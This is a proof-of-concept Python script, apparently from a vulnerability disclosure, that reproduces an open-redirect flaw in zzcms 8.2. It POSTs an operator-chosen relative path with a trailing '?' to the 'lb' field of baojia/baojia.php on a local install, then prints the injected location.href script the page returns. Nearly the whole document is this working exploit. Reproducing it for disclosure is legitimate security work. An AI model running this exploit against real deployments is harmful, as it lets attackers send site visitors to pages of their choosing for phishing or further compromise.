If you want to reproduce the vulnerability, you need to deploy the related environment locally. Project download address:
http://www.zzcms.net/zx/show-167.htm
import requests
import os
import re
# Prompt text: the path, relative to the current directory, that the redirect should resolve to.
# For example: to reach the web root from http://localhost/zzcms8.2, type ../
# Ask the operator for the relative path; poc() below reads it through the
# module-level name ``dir_input``.  The prompt text is kept byte-identical.
_PROMPT = (
    'Please enter the path you want to jump from the current directory.\n'
    'For example: if you want to jump to the root directory from http://localhost/zzcms8.2, then you can type in ../'
)
print(_PROMPT)
print('input:', end="")
dir_input = input()
def poc():
    """Post one crafted search to the local zzcms 8.2 test instance and show the redirect it echoes.

    Reads the module-level ``dir_input`` string, sends it (with a trailing ``?``)
    as the ``lb`` form field to the local deployment, prints the raw response
    body, then extracts and prints the ``<script>location.href=...</script>``
    tag embedded in the page so the redirect target can be inspected.

    Side effects: an HTTP POST to localhost, console output, and a blocking
    ``os.system("pause")`` (Windows ``pause``) before returning.  Nothing is
    returned.
    """
    # The trailing '?' is what truncates the generated location.href value
    # (see the final message below); the response is only read, not acted on.
    form = {'action': 'search', 'lb': dir_input + '?'}
    # This is my local environment
    resp = requests.post('http://localhost/zzcms8.2/baojia/baojia.php', data=form)
    if not resp.content:
        print('unknown mistake')
    else:
        print(resp.content)
        # NOTE(review): re.match anchors at the start of the body and '.' does
        # not cross newlines, so a page whose script tag sits past a line break
        # yields None here and group(1) below raises AttributeError.  Decoding
        # also assumes the body is UTF-8 — confirm against the deployment.
        pattern = '.*?(<script>location.href=.*keyword=.*</script>)'
        body = resp.content.decode('utf-8')
        found = re.match(pattern, body)
        print('\nNow the browser executes the following javascript script when loading the page:')
        print(found.group(1))
        print('The first question mark is truncated, so the browser will jump to the http://localhost/zzcms8.2/baojia/baojia.php'+dir_input)
    # NOTE(review): indentation was lost in the listing; the pause is placed
    # after the if/else so both paths hold the console open — confirm against
    # the original source.
    os.system("pause")
# Entry point: runs the request/inspection flow once, unconditionally at
# module level (no __main__ guard), so importing this file would trigger it too.
poc()